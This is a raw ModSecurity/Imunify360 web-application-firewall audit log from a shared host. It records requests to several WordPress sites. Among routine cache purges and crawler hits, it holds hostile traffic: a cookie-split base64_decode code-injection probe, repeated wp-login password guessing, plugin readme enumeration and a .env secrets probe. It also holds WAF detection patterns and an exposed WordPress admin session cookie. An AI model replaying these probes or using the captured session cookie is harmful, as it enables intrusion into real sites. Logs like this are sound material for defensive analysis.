p5=157, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ae056c47-Z-- --fcb8276a-A-- [01/Jul/2025:12:15:32.871862 +0530] aGOEC5iCtxhaXYEaGXYHrQAAADs 103.185.74.40 12512 192.168.74.40 443 --fcb8276a-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --fcb8276a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fcb8276a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352331540090 1332260 (- - -) Stopwatch2: 1751352331540090 1332260; combined=3333, p1=122, p2=3047, p3=0, p4=0, p5=164, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --fcb8276a-Z-- --41dc6137-A-- [01/Jul/2025:12:15:35.113250 +0530] aGOEDZTiKJgq7f-9wr-FtwAAAAE 51.44.203.200 59479 192.168.74.40 443 --41dc6137-B-- GET /inputs.php HTTP/1.1 Host: hllacademy.in Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Cookie: 67=base64_;80=decode;20=ZWNobyAidGVzdCI7;29=ZWNobyAnWGRheSc7;1=a;3=a;2=a;5=a;4=a;7=a;6=a;9=a;500=a;38=b;90=dGVzdA==;11=a;10=a;13=a;12=a;15=a;14=a;17=a;16=a;19=array25;18=a; Cache-Control: no-cache Upgrade-Insecure-Requests: 1 --41dc6137-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352658213476 16331 (- - -) Stopwatch2: 1751352658213476 16331; combined=4550, p1=129, p2=4242, p3=0, p4=0, p5=179, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3febdc25-Z-- --d83e5c29-A-- [01/Jul/2025:12:20:59.203005 +0530] aGOFUjB0N73AXFOPA_eMGQAAABs 103.185.74.40 2523 192.168.74.40 443 --d83e5c29-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --d83e5c29-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d83e5c29-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352658131882 1071882 (- - -) Stopwatch2: 1751352658131882 1071882; combined=3003, p1=96, p2=2706, p3=0, p4=0, p5=200, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d83e5c29-Z-- --8abb3912-A-- [01/Jul/2025:12:20:59.396732 +0530] aGOFU1C73oIHsUMnOoc8WQAAACI 57.141.0.1 52894 192.168.74.40 443 --8abb3912-B-- GET /rajasthan-tours-from-ahmedabad/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/rajasthan-tours-from-agra/images/Rajasthan-Travel-Guides/hotels-jodhpur.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --8abb3912-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352660330088 14977 (- - -) Stopwatch2: 1751352660330088 14977; combined=2703, p1=155, p2=2414, p3=0, p4=0, p5=134, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b8acd051-Z-- --5efb2f6e-A-- [01/Jul/2025:12:21:00.506199 +0530] aGOFU6DJfRrh2yW952-b4QAAADQ 103.185.74.40 45885 192.168.74.40 443 --5efb2f6e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --5efb2f6e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5efb2f6e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352659412526 1094337 (- - -) Stopwatch2: 1751352659412526 1094337; combined=2787, p1=77, p2=2555, p3=0, p4=0, p5=155, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5efb2f6e-Z-- --33f01e5a-A-- [01/Jul/2025:12:21:01.496500 +0530] aGOFVQ-2HPEVQrMmOV98GwAAACU 20.171.207.232 44014 192.168.74.40 443 --33f01e5a-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/Rajasthan-Travel-Guides/images/aainag/tempo-traveller-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --33f01e5a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352665033770 16825 (- - -) Stopwatch2: 1751352665033770 16825; combined=3694, p1=177, p2=3344, p3=0, p4=0, p5=173, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7b02415e-Z-- --08e02f0e-A-- [01/Jul/2025:12:21:06.119956 +0530] aGOFWakXKBMy4LCH1A42bwAAADU 103.185.74.40 20658 192.168.74.40 443 --08e02f0e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --08e02f0e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --08e02f0e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352665054774 1065781 (- - -) Stopwatch2: 1751352665054774 1065781; combined=2512, p1=94, p2=2278, p3=0, p4=0, p5=140, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --08e02f0e-Z-- --8bc74f5a-A-- [01/Jul/2025:12:21:06.240600 +0530] aGOFWg-2HPEVQrMmOV98HwAAACU 20.171.207.232 44014 192.168.74.40 443 --8bc74f5a-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/https/Rajasthan-Travel-Guides/aainag/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8bc74f5a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352667363304 16142 (- - -) Stopwatch2: 1751352667363304 16142; combined=3296, p1=219, p2=2949, p3=0, p4=0, p5=128, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --01ba8459-Z-- --4c1ad713-A-- [01/Jul/2025:12:21:07.456651 +0530] aGOFWpfceUhBnfXSqMypWAAAACM 103.185.74.40 25012 192.168.74.40 443 --4c1ad713-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4c1ad713-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4c1ad713-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352666335904 1121249 (- - -) Stopwatch2: 1751352666335904 1121249; combined=2749, p1=105, p2=2428, p3=0, p4=0, p5=215, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4c1ad713-Z-- --81e7270a-A-- [01/Jul/2025:12:21:08.493453 +0530] aGOFXA-2HPEVQrMmOV98IQAAACU 20.171.207.232 44014 192.168.74.40 443 --81e7270a-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/js/Rajasthan-Travel-Guides/aainag/tempo-traveller-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --81e7270a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355934370982 1146443 (- - -) Stopwatch2: 1751355934370982 1146443; combined=8316, p1=132, p2=7352, p3=393, p4=22, p5=417, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3d9a3b26-Z-- --33c22564-A-- [01/Jul/2025:13:15:35.859902 +0530] aGOSHhWBv2AsJnceVSBzeAAAAB4 103.185.74.40 36919 192.168.74.40 443 --33c22564-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --33c22564-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --33c22564-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355934698091 1162374 (- - -) Stopwatch2: 1751355934698091 1162374; combined=2570, p1=80, p2=2275, p3=0, p4=0, p5=214, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --33c22564-Z-- --2cd61a67-A-- [01/Jul/2025:13:15:37.005263 +0530] aGOSH4UrLvpnN577nbUtoAAAAEs 199.101.196.88 59933 192.168.74.40 443 --2cd61a67-B-- POST //wp-login.php HTTP/1.1 Host: kenyuryukarateindia.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check; cl-bypass-cache=yes User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 91 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://kenyuryukarateindia.com//wp-login.php --2cd61a67-C-- log=kenyu&pwd=#user#@01&redirect_to=https://kenyuryukarateindia.com//wp-admin/&testcookie=1 --2cd61a67-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355935821246 1184662 (- - -) Stopwatch2: 1751355935821246 1184662; combined=7167, p1=165, p2=6171, p3=356, p4=20, p5=454, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --2cd61a67-Z-- --295e173a-A-- [01/Jul/2025:13:15:37.319968 +0530] aGOSIDWGstM5WbqzxyhabwAAACw 103.185.74.40 22694 192.168.74.40 443 --295e173a-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --295e173a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --295e173a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751355936072266 1248225 (- - -) Stopwatch2: 1751355936072266 1248225; combined=2621, p1=111, p2=2356, p3=0, p4=0, p5=153, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --295e173a-Z-- --81153d65-A-- [01/Jul/2025:13:15:38.494737 +0530] aGOSIYUrLvpnN577nbUtoQAAAEs 199.101.196.88 59933 192.168.74.40 443 --81153d65-B-- POST //wp-login.php HTTP/1.1 Host: kenyuryukarateindia.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check; cl-bypass-cache=yes User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 93 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://kenyuryukarateindia.com//wp-login.php --81153d65-C-- log=kenyu&pwd=#user#@0123&redirect_to=https://kenyuryukarateindia.com//wp-admin/&testcookie=1 --81153d65-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751357427935920 1715693 (- - -) Stopwatch2: 1751357427935920 1715693; combined=9074, p1=182, p2=7901, p3=425, p4=32, p5=533, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --bc6cb944-Z-- --c81caa5d-A-- [01/Jul/2025:13:40:29.908936 +0530] aGOX9UY8uSEEYPJxzFJtYwAAACI 103.185.74.40 19431 192.168.74.40 443 --c81caa5d-B-- POST /2024/relite/wp-admin/admin-ajax.php?action=elementor_1_elementor_updater&nonce=f7fabb23aa HTTP/1.1 Host: wpcodex.xyz User-Agent: WordPress/6.8.1; https://wpcodex.xyz/2024/relite Accept: */* Accept-Encoding: deflate, gzip Cookie: wordpress_sec_960ef4ad69df7c4138c6955def0d03e6=admin|1752472688|NouczWVVe15makFTa5YMSDr3bMIYKTagoH8CpNdJKxY|ddbc6dca02f0339f92c76c5a6809fd22c31fc37c91a02de5abbf8ec2ec4b8361; wordpress_test_cookie=WP Cookie check; wordpress_logged_in_960ef4ad69df7c4138c6955def0d03e6=admin|1752472688|NouczWVVe15makFTa5YMSDr3bMIYKTagoH8CpNdJKxY|0f7f46ddee8a47a3a56bbf58729cd71aa66f0dad49f447e08c2b04e52568c497; wp_lang=en_US; wp-settings-1=libraryContent=browse&editor=tinymce; wp-settings-time-1=1751351709 Connection: close Content-Length: 194 Content-Type: application/x-www-form-urlencoded --c81caa5d-C-- 0%5Bcallback%5D%5B0%5D=Elementor%5CCore%5CUpgrade%5CUpgrades&0%5Bcallback%5D%5B1%5D=_on_each_version&1%5Bcallback%5D%5B0%5D=Elementor%5CCore%5CUpgrade%5CUpgrades&1%5Bcallback%5D%5B1%5D=_v_3_26_0 --c81caa5d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin X-Frame-Options: SAMEORIGIN Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c81caa5d-H-- Message: Pattern match "(?:edit-theme-plugin-file|update|activate|(?:upload|install-(?:plugin|theme)))" at ARGS:action. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/004_i360_vectors.conf"] [line "41"] [id "77316925"] [msg "IM360 WAF: WordPress theme/plugin activity track||File:||SC:/home/brainsto/public_html/2024/relite/wp-admin/admin-ajax.php||Action:||Theme:||Plugin:||User:brainsto||WPU:admin||RSV:7.05||RS:0||T:APACHE||"] [severity "DEBUG"] [tag "wp_core"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751357429116710 792977 (- - -) Stopwatch2: 1751357429116710 792977; combined=12674, p1=255, p2=11621, p3=352, p4=7, p5=439, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c81caa5d-Z-- --e255237e-A-- [01/Jul/2025:13:40:32.277926 +0530] aGOX9Zpr2la02YxMBRp-YgAAABs 173.239.211.177 28767 192.168.74.40 443 --e255237e-B-- POST //wp-login.php HTTP/1.1 Host: kenyuryukarateindia.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check; cl-bypass-cache=yes User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 90 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --deb5e86c-Z-- --23b5df5e-A-- [01/Jul/2025:14:04:53.936323 +0530] aGOdraUwjZ1tF9Kajvj-EwAAADo 143.198.202.179 62382 192.168.74.40 80 --23b5df5e-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --23b5df5e-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --23b5df5e-H-- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1820"] [id "77350190"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "readme.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1827"] [id "77350589"] [msg "IM360 WAF: WordPress plugins/themes version enumeration using readme.txt||MV:/wp-content/plugins/litespeed-cache/readme.txt||User:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "/wp-content/plugins/litespeed-cache/readme.txt" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "2221"] [id "77350639"] [msg "IM360 WAF: Suspicious access attempt to WordPress debug.log (CVE-2024-44000)||MV:/wp-content/plugins/litespeed-cache/readme.txt||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] Apache-Handler: default-handler Stopwatch: 1751358893929056 7364 (- - -) Stopwatch2: 1751358893929056 7364; combined=4034, p1=99, p2=3817, p3=0, p4=0, p5=118, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --23b5df5e-Z-- --e96c0f17-A-- [01/Jul/2025:14:04:53.987876 +0530] aGOdrZSn3bRNgiObRJqlLwAAACI 20.171.207.232 52184 192.168.74.40 443 --e96c0f17-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/images/aainag/Rajasthan-Travel-Guides/Map-of-Rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e96c0f17-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e96c0f17-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/images/aainag/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/images/aainag/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d062a66d-Z-- --cdae3260-A-- [01/Jul/2025:14:10:12.232803 +0530] aGOe6wcsiZB0cO2JNq0LlgAAAA8 162.243.75.54 58326 192.168.74.40 443 --cdae3260-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --cdae3260-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --cdae3260-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359211682303 550939 (- - -) Stopwatch2: 1751359211682303 550939; 